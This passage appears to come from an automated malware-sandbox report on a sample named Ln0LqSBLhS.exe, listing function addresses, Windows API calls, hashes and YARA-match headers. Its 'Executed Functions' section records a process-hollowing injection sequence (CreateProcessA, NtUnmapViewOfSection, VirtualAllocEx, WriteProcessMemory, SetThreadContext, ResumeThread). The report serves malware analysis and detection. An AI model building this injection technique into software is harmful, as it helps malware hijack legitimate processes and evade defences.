                                                                                                                                                                                                      • API String ID: 3446180046-0
                                                                                                                                                                                                      • Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                                                                                                                                      • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00422130, Relevance: 6.2, APIs: 4, Instructions: 163COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2974526305-0
                                                                                                                                                                                                      • Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                                                                                                                                      • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0043C677, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                                                      • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                                                                                                                                      • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040F0E0, Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1421093161-0
                                                                                                                                                                                                      • Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                                                                                                                                      • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004409B9, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                                                      • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                                                                      • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004127A0, Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrlenW.KERNEL32 ref: 004127B9
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 004127C3
                                                                                                                                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00740000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                                                                                      • _memset.LIBCMT ref: 004127CE
                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2824100046-0
                                                                                                                                                                                                      • Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                                                                                                                                                                                      • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00414920, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                                      • String ID: invalid string position$string too long
                                                                                                                                                                                                      • API String ID: 4104443479-4289949731
                                                                                                                                                                                                      • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                                                                                                                      • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00417D50, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                                      • String ID: invalid string position$string too long
                                                                                                                                                                                                      • API String ID: 4104443479-4289949731
                                                                                                                                                                                                      • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                                                                                                                      • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004516A0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: .\crypto\err\err.c$unknown
                                                                                                                                                                                                      • API String ID: 0-565200744
                                                                                                                                                                                                      • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                                                                                                                      • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0042A77E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                                                                                                                                                                                      • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                      • String ID: 8Q
                                                                                                                                                                                                      • API String ID: 3761405300-2096853525
                                                                                                                                                                                                      • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                                                                                                                      • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00413C40, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                                                                                                                                                                                                        • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00413C83
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                                                                                                                      • String ID: vector<T> too long
                                                                                                                                                                                                      • API String ID: 1327501947-3788999226
                                                                                                                                                                                                      • Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                                                                                                                                                                                                      • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00480620, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00480686
                                                                                                                                                                                                        • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                                                                                                                                                                                      • .\crypto\evp\digest.c, xrefs: 00480638
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memset_raise
                                                                                                                                                                                                      • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                                                                                                      • API String ID: 1484197835-3867593797
                                                                                                                                                                                                      • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                                                                                                                      • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004242A7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DecodePointer.KERNEL32(?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C,?,00427F58,00000003,00428BB9,00507BD0,00000008,00428B0E,i;B), ref: 004242B0
                                                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 004242CC
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DecodePointer__invoke_watson
                                                                                                                                                                                                      • String ID: i;B
                                                                                                                                                                                                      • API String ID: 4034010525-472376889
                                                                                                                                                                                                      • Opcode ID: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
                                                                                                                                                                                                      • Instruction ID: 4f0f565c0ac0667cc87bbfc5f091dd064a73676b217a34b06ab6fef57441037f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2E0EC31510119FBDF012FA2EC05DAA3B69FF44294B8044A5FE1480171D776C870ABA9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0044F23E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0044F251
                                                                                                                                                                                                        • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F266
                                                                                                                                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                      • String ID: TeM
                                                                                                                                                                                                      • API String ID: 757275642-2215902641
                                                                                                                                                                                                      • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                                                                                      • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Analysis Process: Ln0LqSBLhS.exe PID: 6632 Parent PID: 6536 Ln0LqSBLhS.exeCOMMON

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 03B20110, Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 03B20156
                                                                                                                                                                                                      • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 03B2016C
                                                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,00000000), ref: 03B20255
                                                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03B20270
                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 03B20283
                                                                                                                                                                                                      • GetThreadContext.KERNELBASE(00000000,?), ref: 03B2029F
                                                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 03B202C8
                                                                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 03B202E3
                                                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 03B20304
                                                                                                                                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 03B2032A
                                                                                                                                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 03B20399
                                                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 03B203BF
                                                                                                                                                                                                      • SetThreadContext.KERNELBASE(00000000,?), ref: 03B203E1
                                                                                                                                                                                                      • ResumeThread.KERNELBASE(00000000), ref: 03B203ED
                                                                                                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 03B20412
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Offset: 03B20000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2875986403-0
                                                                                                                                                                                                      • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                                                      • Instruction ID: e897f7f1db8b108c3f65f7cd95d008b0c96854d58f03730a7442957f756b4193
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CCB1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E909AB391D771AE41CF94
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03B20420, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 03B20533
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Offset: 03B20000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateWindow
                                                                                                                                                                                                      • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                                                                                      • API String ID: 716092398-2341455598
                                                                                                                                                                                                      • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                      • Instruction ID: cbb7be7cd0eb0531788deb85c3f379f77d2de007b6ae5dfd9364dce59dea7a5f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A513C70D08388DEEB11DBD8C849BDDBFB6AF11708F144199E5487F286C3BA5558CB61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03B205B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(apfHQ), ref: 03B205EC
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Offset: 03B20000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                      • String ID: apfHQ$o
                                                                                                                                                                                                      • API String ID: 3188754299-2999369273
                                                                                                                                                                                                      • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                      • Instruction ID: 5c1592184101a70e12097dca6df8cb4d7cd2a8af1bba4a22086e07fb99d88cde
                                                                                                                                                                                                      • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4010C70C0425CEEDF11EB98C5583AEBFB5AB41308F1881E9C4192B241D7B69B58CBA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 020A07C6, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 020A080E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.244540402.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
